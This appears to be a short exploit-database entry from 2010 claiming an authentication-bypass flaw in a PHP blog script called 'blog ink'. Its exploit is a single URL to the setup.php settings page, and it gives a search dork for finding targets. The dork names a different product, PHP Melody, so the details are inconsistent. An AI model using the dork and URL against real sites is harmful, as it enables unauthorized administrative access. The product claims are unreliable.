id: 10914
date: 02/15/2010
title: blog ink Bypass Setting Vulnerability
author: indoushka
cves: 

=====================================
blog ink Bypass Setting Vulnerability 
=====================================

========================================================================================                 
| # Title        : blog ink By Pass Setting Vulnerability     
| # Author       : indoushka                                                               
| # Script Home  : powered by blog ink                                                                                                                     
| # Dork         : Powered by PHP Melody 1.5.3                                       
| # Tested on    : windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug          : By Pass Setting                                                                  
======================      Exploit By indoushka       =================================
# Exploit  :
  
  http://127.0.0.1/blogink/setup.php?do=settings



#  0day.today [2023-03-22]  #